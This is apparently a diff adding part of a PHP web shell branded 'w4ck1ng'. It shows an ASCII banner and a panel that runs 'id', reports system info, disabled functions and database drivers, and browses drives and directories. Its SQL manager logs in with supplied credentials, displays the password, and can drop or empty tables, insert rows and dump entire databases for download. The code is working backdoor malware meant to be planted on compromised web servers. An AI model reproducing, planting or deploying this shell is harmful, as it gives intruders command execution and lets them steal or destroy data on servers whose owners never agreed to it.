+      <font color="#333333">w4ck1ngw4ck1ngw4</font><font color="white">ck1</font><font color="#333333">ngw4ck</font><font color="white">1ngw</font><font color="#333333">4ck1ngw4</font><font color="white">ck1ng</font><font color="#333333">w4ck1n</font><font color="white">gw4ck1ngw</font><font color="#333333">4ck1</font><font color="white">ngw4</font><font color="#333333">ck1ngw4ck</font><font color="white">1ngw4ck1ngw4c</font><font color="#333333">k1n</font><font color="white">gw4</font><font color="#333333">ck1n</font><font color="white">gw4</font><font color="#333333">ck1ngw4ck1ngw</font><font color="white">4ck1ng</font><font color="#333333">w4ck1ngw4ck</font><br>
+
+      <font color="#333333">1ngw4ck1ngw4ck1ngw4ck1ngw4</font><font color="white">c</font><font color="#333333">k1ngw4ck1ng</font><font color="white">w</font><font color="#333333">4ck1ngw4ck1ngw4ck1ngw4ck1n</font><font color="white">g</font><font color="#333333">w4ck1ngw4c</font><font color="white">k1ngw4</font><font color="#333333">c</font><font color="white">k</font><font color="#333333">1ngw4c</font><font color="white">k1n</font><font color="#333333">gw4c</font><font color="white">k1n</font><font color="#333333">gw4ck1ngw4ck1ngw</font><font color="white">4ck1n</font><font color="#333333">gw4ck1ngw</font><br>
+
+      <font color="#333333">4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ng</font><font color="white">w4</font><font color="#333333">ck1ngw4ck1ngw4ck1n</font><font color="white">gw4ck</font><font color="#333333">1ngw4ck1</font><br>
+      <font color="#333333">ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1</font><font color="white">n</font><font color="#333333">gw4ck1ngw4ck1ngw4ck1ng</font><font color="white">w</font><font color="#333333">4ck1ngw4</font></br>
+  </span>&nbsp;</p></th></tr><tr><td><p align="left"><b>Software:&nbsp;<?php echo $DISP_SERVER_SOFTWARE; ?></b>&nbsp;</p><p align="left"><b>System Info:&nbsp;<?php echo wordwrap(php_uname(),90,"<br>",1); ?></b>&nbsp;</p><? echo "<b>Disabled functions</b>: <b>";
+if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";} ?><p align="left"><b>We are: <?php if (!$win) {echo wordwrap(myshellexec("id"),90,"<br>",1);} else {echo get_current_user();} ?><?php $curl_on = @function_exists('curl_version');
+echo "<br/>cURL: <b>".(($curl_on)?("<font color=green>ON</font>"):("<font color=red>OFF</font>")); ?></br><? if(@ini_get("register_globals")){$reg_g="<font color=green>ON</font>";}else{$reg_g="<font color=red>OFF</font>";} echo("<b>Register globals:</b> $reg_g"); ?><?php echo "<br/>MySQL: <b>";
+$mysql_on = @function_exists('mysql_connect');
+if($mysql_on){
+echo "<font color=green>ON</font>"; } else { echo "<font color=red>OFF</font>"; }
+echo "</b>";
+echo "<br/>MSSQL: <b>";
+$mssql_on = @function_exists('mssql_connect');
+if($mssql_on){echo "<font color=green>ON</font>";}else{echo "<font color=red>OFF</font>";} ?><?php echo "<br/>PostgreSQL: <b>";
+$pg_on = @function_exists('pg_connect');
+if($pg_on){echo "<font color=green>ON</font>";}else{echo "<font color=red>OFF</font>";} ?><?php echo "<br/>Oracle: <b>";
+$ora_on = @function_exists('ocilogon');
+if($ora_on){echo "<font color=green>ON</font>";}else{echo "<font color=red>OFF</font>";} ?> </b>&nbsp;</p><p align="left"><b>Safe-mode:&nbsp;<?php echo $hsafemode; ?></b></p><p align="left"><?php
+$d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+if (empty($d)) {$d = realpath(".");} elseif(realpath($d)) {$d = realpath($d);}
+$d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+$d = str_replace("\\\\","\\",$d);
+$dispd = htmlspecialchars($d);
+$pd = $e = explode(DIRECTORY_SEPARATOR,substr($d,0,-1));
+$i = 0;
+foreach($pd as $b)
+{
+ $t = "";
+ $j = 0;
+ foreach ($e as $r)
+ {
+  $t.= $r.DIRECTORY_SEPARATOR;
+  if ($j == $i) {break;}
+  $j++;
+ }
+ echo "<a href=\"".$surl."act=ls&d=".urlencode($t)."&sort=".$sort."\"><b>".htmlspecialchars($b).DIRECTORY_SEPARATOR."</b></a>";
+ $i++;
+}
+echo "&nbsp;&nbsp;&nbsp;";
+if (is_writable($d))
+{
+ $wd = TRUE;
+ $wdt = "<font color=green>[ ok ]</font>";
+ echo "<b><font color=green>".view_perms(fileperms($d))."</font></b>";
+}
+else
+{
+ $wd = FALSE;
+ $wdt = "<font color=red>[ Read-Only ]</font>";
+ echo "<b>".view_perms_color($d)."</b>";
+}
+if (is_callable("disk_free_space"))
+{
+ $free = disk_free_space($d);
+ $total = disk_total_space($d);
+ if ($free === FALSE) {$free = 0;}
+ if ($total === FALSE) {$total = 0;}
+ if ($free < 0) {$free = 0;}
+ if ($total < 0) {$total = 0;}
+ $used = $total-$free;
+ $free_percent = round(100/($total/$free),2);
+ echo "<br><b>Free ".view_size($free)." of ".view_size($total)." (".$free_percent."%)</b>";
+
+}
+echo "<br>";
+echo "<b>Your ip: <a href=http://".$_SERVER["REMOTE_ADDR"].">".$_SERVER["REMOTE_ADDR"]."</a> - Server ip: <a href=http://".gethostbyname($_SERVER["HTTP_HOST"]).">".gethostbyname($_SERVER["HTTP_HOST"])."</a></b><br/>";
+$letters = "";
+if ($win)
+{
+ $v = explode("\\",$d);
+ $v = $v[0];
+ foreach (range("a","z") as $letter)
+ {
+  $bool = $isdiskette = in_array($letter,$safemode_diskettes);
+  if (!$bool) {$bool = is_dir($letter.":\\");}
+  if ($bool)
+  {
+   $letters .= "<a href=\"".$surl."act=ls&d=".urlencode($letter.":\\")."\"".($isdiskette?" onclick=\"return confirm('Make sure that the diskette is inserted properly, otherwise an error may occur.')\"":"").">[ ";
+   if ($letter.":" != $v) {$letters .= $letter;}
+   else {$letters .= "<font color=green>".$letter."</font>";}
+   $letters .= " ]</a> ";
+  }
+ }
+ if (!empty($letters)) {echo "<b>Detected drives</b>: ".$letters."<br>";}
+}
+if (count($quicklaunch) > 0)
+{
+ foreach($quicklaunch as $item)
+ {
+  $item[1] = str_replace("%d",urlencode($d),$item[1]);
+  $item[1] = str_replace("%sort",$sort,$item[1]);
+  $v = realpath($d."..");
+  if (empty($v)) {$a = explode(DIRECTORY_SEPARATOR,$d); unset($a[count($a)-2]); $v = join(DIRECTORY_SEPARATOR,$a);}
+  $item[1] = str_replace("%upd",urlencode($v),$item[1]);
+  echo "<a href=\"".$item[1]."\">".$item[0]."</a>&nbsp;&nbsp;&nbsp;&nbsp;";
+ }
+}
+echo "</p></td></tr></table><br>";
+if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">".$donated_html."</td></tr></table><br>";}
+echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">";
+if ($act == "") {$act = $dspact = "ls";}
+if ($act == "sql")
+{
+ $sql_surl = $surl."act=sql";
+ if ($sql_login)  {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);}
+ if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);}
+ if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);}
+ if ($sql_port)   {$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);}
+ if ($sql_db)     {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);}
+ $sql_surl .= "&";
+ ?><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><td width="100%" height="1" colspan="2" valign="top"><center><?php
+ if ($sql_server)
+ {
+  $sql_sock = mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd);
+  $err = mysql_smarterror();
+  @mysql_select_db($sql_db,$sql_sock);
+  if ($sql_query and $submit) {$sql_query_result = mysql_query($sql_query,$sql_sock); $sql_query_error = mysql_smarterror();}
+ }
+ else {$sql_sock = FALSE;}
+ echo "<b>SQL Manager:</b><br>";
+ if (!$sql_sock)
+ {
+  if (!$sql_server) {echo "NO CONNECTION";}
+  else {echo "<center><b>Can't connect</b></center>"; echo "<b>".$err."</b>";}
+ }
+ else
+ {
+  $sqlquicklaunch = array();
+  $sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&");
+  $sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl));
+  $sqlquicklaunch[] = array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus");
+  $sqlquicklaunch[] = array("Server variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars");
+  $sqlquicklaunch[] = array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes");
+  $sqlquicklaunch[] = array("Logout",$surl."act=sql");
+  echo "<center><b>MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")</b><br>";
+  if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\"><b>".$item[0]."</b></a> ] ";}}
+  echo "</center>";
+ }
+ echo "</td></tr><tr>";
+ if (!$sql_sock) {?><td width="28%" height="100" valign="top"><center><font size="5"><br/></font></center><li>If login is null, login is owner of process.<li>If host is null, host is localhost</b><li>If port is null, port is 3306 (default)</td><td width="90%" height="1" valign="top"><TABLE height=1 cellSpacing=0 cellPadding=0 width="100%" border=0><tr><td>&nbsp;<table><tr><td><b>Username</b></td><td><b>Password</b>&nbsp;</td><td><b>Database</b>&nbsp;</td></tr><form action="<?php echo $surl; ?>" method="POST"><input type="hidden" name="act" value="sql"><tr><td><input type="text" name="sql_login" value="root" maxlength="64"></td><td><input type="password" name="sql_passwd" value="" maxlength="64"></td><td><input type="text" name="sql_db" value="" maxlength="64"></td></tr><tr><td><b>Host</b></td><td><b>PORT</b></td></tr><tr><td align=right><input type="text" name="sql_server" value="localhost" maxlength="64"></td><td><input type="text" name="sql_port" value="3306" maxlength="6" size="3"></td><td><input type="submit" value="Connect"></td></tr><tr><td></td></tr></form></table></td><?php }
+ else
+ {
+  //Start left panel
+  if (!empty($sql_db))
+  {
+   ?><td width="25%" height="100%" valign="top"><a href="<?php echo $surl."w4/act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"; ?>"><b>Home</b></a><hr size="1" noshade><?php
+   $result = mysql_list_tables($sql_db);
+   if (!$result) {echo mysql_smarterror();}
+   else
+   {
+    echo "---[ <a href=\"".$sql_surl."&\"><b>".htmlspecialchars($sql_db)."</b></a> ]---<br>";
+    $c = 0;
+    while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "<b>»&nbsp;<a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".htmlspecialchars($row[0])."</b></a> (".$count_row[0].")</br></b>"; mysql_free_result($count); $c++;}
+    if (!$c) {echo "No tables found in database.";}
+   }
+  }
+  else
+  {
+   ?><td width="1" height="100" valign="top"><a href="<?php echo $sql_surl; ?>"><b>Home</b></a><hr size="1" noshade><?php
+   $result = mysql_list_dbs($sql_sock);
+   if (!$result) {echo mysql_smarterror();}
+   else
+   {
+    ?><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><select name="sql_db"><?php
+    $c = 0;
+    $dbs = "";
+    while ($row = mysql_fetch_row($result)) {$dbs .= "<option value=\"".$row[0]."\""; if ($sql_db == $row[0]) {$dbs .= " selected";} $dbs .= ">".$row[0]."</option>"; $c++;}
+    echo "<option value=\"\">Databases (".$c.")</option>";
+    echo $dbs;
+   }
+   ?></select><hr size="1" noshade>Please, select database<hr size="1" noshade><input type="submit" value="Go"></form><?php
+  }
+  //End left panel
+  echo "</td><td width=\"100%\" height=\"1\" valign=\"top\">";
+  //Start center panel
+  $diplay = TRUE;
+  if ($sql_db)
+  {
+   if (!is_numeric($c)) {$c = 0;}
+   if ($c == 0) {$c = "no";}
+   echo "<hr size=\"1\" noshade><center><b>There are ".$c." table(s) in this DB (".htmlspecialchars($sql_db).").<br>";
+   if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\">".$item[0]."</a> ] ";}}
+   echo "</b></center>";
+   $acts = array("","dump");
+   if ($sql_act == "tbldrop") {$sql_query = "DROP TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+   elseif ($sql_act == "tblempty") {$sql_query = ""; foreach($boxtbl as $v) {$sql_query .= "DELETE FROM `".$v."` \n";} $sql_act = "query";}
+   elseif ($sql_act == "tbldump") {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_act = "dump";}
+   elseif ($sql_act == "tblcheck") {$sql_query = "CHECK TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+   elseif ($sql_act == "tbloptimize") {$sql_query = "OPTIMIZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+   elseif ($sql_act == "tblrepair") {$sql_query = "REPAIR TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+   elseif ($sql_act == "tblanalyze") {$sql_query = "ANALYZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+   elseif ($sql_act == "deleterow") {$sql_query = ""; if (!empty($boxrow_all)) {$sql_query = "DELETE * FROM `".$sql_tbl."`;";} else {foreach($boxrow as $v) {$sql_query .= "DELETE * FROM `".$sql_tbl."` WHERE".$v." LIMIT 1;\n";} $sql_query = substr($sql_query,0,-1);} $sql_act = "query";}
+   elseif ($sql_tbl_act == "insert")
+   {
+    if ($sql_tbl_insert_radio == 1)
+    {
+     $keys = "";
+     $akeys = array_keys($sql_tbl_insert);
+     foreach ($akeys as $v) {$keys .= "`".addslashes($v)."`, ";}
+     if (!empty($keys)) {$keys = substr($keys,0,strlen($keys)-2);}
+     $values = "";
+     $i = 0;
+     foreach (array_values($sql_tbl_insert) as $v) {if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) {$values .= $funct." (";} $values .= "'".addslashes($v)."'"; if ($funct) {$values .= ")";} $values .= ", "; $i++;}
+     if (!empty($values)) {$values = substr($values,0,strlen($values)-2);}
+     $sql_query = "INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );";
+     $sql_act = "query";
+     $sql_tbl_act = "browse";
+    }
+    elseif ($sql_tbl_insert_radio == 2)
+    {
+     $set = mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs);
+     $sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;";
+     $result = mysql_query($sql_query) or print(mysql_smarterror());
+     $result = mysql_fetch_array($result, MYSQL_ASSOC);
+     $sql_act = "query";
+     $sql_tbl_act = "browse";
+    }
+   }
+   if ($sql_act == "query")
+   {
+    echo "<hr size=\"1\" noshade>";
+    if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
+    if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
+    if ((!$submit) or ($sql_act)) {echo "<table border=\"0\" width=\"100%\" height=\"1\"><tr><td><form action=\"".$sql_surl."\" method=\"POST\"><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to:";} else {echo "SQL-Query :";} echo "</b><br><br><textarea name=\"sql_query\" cols=\"100\" rows=\"10\">".htmlspecialchars($sql_query)."</textarea><br><br><input type=\"hidden\" name=\"sql_act\" value=\"query\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"submit\" value=\"1\"><input type=\"hidden\" name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=\"submit\" name=\"sql_confirm\" value=\"Yes\">&nbsp;<input type=\"submit\" value=\"No\"></form></td></tr></table>";}
+   }
+   if (in_array($sql_act,$acts))
+   {
+    ?><table border="0" width="100%" height="1"><tr>
+    <td width="30%" height="1"><b>Create a new table:</b>
+      <form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newtbl"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newtbl" size="20">&nbsp;<input type="submit" value="Create"></form></td>
+    
+    <td width="30%" height="1"><b>Dump DataBase:</b>
+      <form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="dump"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="dump_file" size="30" value="<?php echo "dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql"; ?>">&nbsp;<input type="submit" name=\"submit\" value="Dump"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php
+    if (!empty($sql_act)) {echo "<hr size=\"1\" noshade>";}
+    if ($sql_act == "newtbl")
+    {
+     echo "<b>";
+     if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";
+    }
+    else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();}
+   }
+   elseif ($sql_act == "dump")
+   {
+    if (empty($submit))
+    {
+     $diplay = FALSE;
+     echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_act\" value=\"dump\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><b>SQL-Dump:</b><br><br>";
+     echo "<b>DB:</b>&nbsp;<input type=\"text\" name=\"sql_db\" value=\"".urlencode($sql_db)."\"><br><br>";
+     $v = join (";",$dmptbls);
+     echo "<b>Only tables (explode \";\")&nbsp;<b><sup>1</sup></b>:</b>&nbsp;<input type=\"text\" name=\"dmptbls\" value=\"".htmlspecialchars($v)."\" size=\"".(strlen($v)+5)."\"><br><br>";
+     if ($dump_file) {$tmp = $dump_file;}
+     else {$tmp = htmlspecialchars("./dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql");}
+     echo "<b>File:</b>&nbsp;<input type=\"text\" name=\"sql_dump_file\" value=\"".$tmp."\" size=\"".(strlen($tmp)+strlen($tmp) % 30)."\"><br><br>";
+     echo "<b>Download: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_download\" value=\"1\" checked><br><br>";
+     echo "<b>Save to file: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_savetofile\" value=\"1\" checked>";
+     echo "<br><br><input type=\"submit\" name=\"submit\" value=\"Dump\"><br><br><b><sup>1</sup></b> - all, if empty";
+     echo "</form>";
+    }
+    else
+    {
+     $diplay = TRUE;
+     $set = array();
+     $set["sock"] = $sql_sock;
+     $set["db"] = $sql_db;
+     $dump_out = "download";
+     $set["print"] = 0;
+     $set["nl2br"] = 0;
+     $set[""] = 0;
+     $set["file"] = $dump_file;
+     $set["add_drop"] = TRUE;
+     $set["onlytabs"] = array();
+     if (!empty($dmptbls)) {$set["onlytabs"] = explode(";",$dmptbls);}
+     $ret = mysql_dump($set);
+     if ($sql_dump_download)
+     {
+      @ob_clean();
+      header("Content-type: application/octet-stream");
+      header("Content-length: ".strlen($ret));
+      header("Content-disposition: attachment; filename=\"".basename($sql_dump_file)."\";");
+      echo $ret;
+      exit;
+     }
+     elseif ($sql_dump_savetofile)
+     {
+      $fp = fopen($sql_dump_file,"w");
+      if (!$fp) {echo "<b>Dump error! Can't write to \"".htmlspecialchars($sql_dump_file)."\"!";}
+      else
+      {
+       fwrite($fp,$ret);
+       fclose($fp);
+       echo "<b>Dumped! Dump has been writed to \"".htmlspecialchars(realpath($sql_dump_file))."\" (".view_size(filesize($sql_dump_file)).")</b>.";
+      }
+     }
+     else {echo "<b>Dump: nothing to do!</b>";}
+    }
+   }
+   if ($diplay)
+   {
+    if (!empty($sql_tbl))
+    {
+     if (empty($sql_tbl_act)) {$sql_tbl_act = "browse";}
+     $count = mysql_query("SELECT COUNT(*) FROM `".$sql_tbl."`;");
+     $count_row = mysql_fetch_array($count);
+     mysql_free_result($count);
+     $tbl_struct_result = mysql_query("SHOW FIELDS FROM `".$sql_tbl."`;");
+     $tbl_struct_fields = array();
+     while ($row = mysql_fetch_assoc($tbl_struct_result)) {$tbl_struct_fields[] = $row;}
+     if ($sql_ls > $sql_le) {$sql_le = $sql_ls + $perpage;}
+     if (empty($sql_tbl_page)) {$sql_tbl_page = 0;}
+     if (empty($sql_tbl_ls)) {$sql_tbl_ls = 0;}
+     if (empty($sql_tbl_le)) {$sql_tbl_le = 30;}
+     $perpage = $sql_tbl_le - $sql_tbl_ls;
+     if (!is_numeric($perpage)) {$perpage = 10;}
+     $numpages = $count_row[0]/$perpage;
+     $e = explode(" ",$sql_order);
+     if (count($e) == 2)
+     {
+      if ($e[0] == "d") {$asc_desc = "DESC";}
+      else {$asc_desc = "ASC";}
+      $v = "ORDER BY `".$e[1]."` ".$asc_desc." ";
+     }
+     else {$v = "";}
+     $query = "SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage."";
+     $result = mysql_query($query) or print(mysql_smarterror());
+     echo "<hr size=\"1\" noshade><center><b>Table ".htmlspecialchars($sql_tbl)." (".mysql_num_fields($result)." cols and ".$count_row[0]." rows)</b></center>";
+     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=structure\">[&nbsp;<b>Structure</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
+     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=browse\">[&nbsp;<b>Browse</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
+     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_act=tbldump&thistbl=1\">[&nbsp;<b>Dump</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
+     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=insert\">[&nbsp;<b>Insert</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
+     if ($sql_tbl_act == "structure") {echo "<br><br><b>Coming sooon!</b>";}
+     if ($sql_tbl_act == "insert")
+     {
+      if (!is_array($sql_tbl_insert)) {$sql_tbl_insert = array();}
+      if (!empty($sql_tbl_insert_radio))
+      {
+
+      }
+      else
+      {
+       echo "<br><br><b>Inserting row into table:</b><br>";
+       if (!empty($sql_tbl_insert_q))
+       {
+        $sql_query = "SELECT * FROM `".$sql_tbl."`";
+        $sql_query .= " WHERE".$sql_tbl_insert_q;
+        $sql_query .= " LIMIT 1;";
+        $result = mysql_query($sql_query,$sql_sock) or print("<br><br>".mysql_smarterror());
+        $values = mysql_fetch_assoc($result);
+        mysql_free_result($result);
+       }
+       else {$values = array();}
+       echo "<form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td><b>Field</b></td><td><b>Type</b></td><td><b>Function</b></td><td><b>Value</b></td></tr>";
+       foreach ($tbl_struct_fields as $field)
+       {
+        $name = $field["Field"];
+        if (empty($sql_tbl_insert_q)) {$v = "";}
+        echo "<tr><td><b>".htmlspecialchars($name)."</b></td><td>".$field["Type"]."</td><td><select name=\"sql_tbl_insert_functs[".htmlspecialchars($name)."]\"><option value=\"\"></option><option>PASSWORD</option><option>MD5</option><option>ENCRYPT</option><option>ASCII</option><option>CHAR</option><option>RAND</option><option>LAST_INSERT_ID</option><option>COUNT</option><option>AVG</option><option>SUM</option><option value=\"\">--------</option><option>SOUNDEX</option><option>LCASE</option><option>UCASE</option><option>NOW</option><option>CURDATE</option><option>CURTIME</option><option>FROM_DAYS</option><option>FROM_UNIXTIME</option><option>PERIOD_ADD</option><option>PERIOD_DIFF</option><option>TO_DAYS</option><option>UNIX_TIMESTAMP</option><option>USER</option><option>WEEKDAY</option><option>CONCAT</option></select></td><td><input type=\"text\" name=\"sql_tbl_insert[".htmlspecialchars($name)."]\" value=\"".htmlspecialchars($values[$name])."\" size=50></td></tr>";
+        $i++;
+       }
+       echo "</table><br>";
+       echo "<input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"1\""; if (empty($sql_tbl_insert_q)) {echo " checked";} echo "><b>Insert as new row</b>";
+       if (!empty($sql_tbl_insert_q)) {echo " or <input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"2\" checked><b>Save</b>"; echo "<input type=\"hidden\" name=\"sql_tbl_insert_q\" value=\"".htmlspecialchars($sql_tbl_insert_q)."\">";}
+       echo "<br><br><input type=\"submit\" value=\"Confirm\"></form>";
+      }
+     }
+     if ($sql_tbl_act == "browse")
+     {
+      $sql_tbl_ls = abs($sql_tbl_ls);
+      $sql_tbl_le = abs($sql_tbl_le);
+      echo "<hr size=\"1\" noshade>";
+      echo "[Pages]&nbsp;";
+      $b = 0;
+      for($i=0;$i<$numpages;$i++)
+      {
+       if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_order=".htmlspecialchars($sql_order)."&sql_tbl_ls=".($i*$perpage)."&sql_tbl_le=".($i*$perpage+$perpage)."\"><u>";}
+       echo $i;
+       if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "</u></a>";}
+       if (($i/30 == round($i/30)) and ($i > 0)) {echo "<br>";}
+       else {echo "&nbsp;";}
+      }
+      if ($i == 0) {echo "empty";}
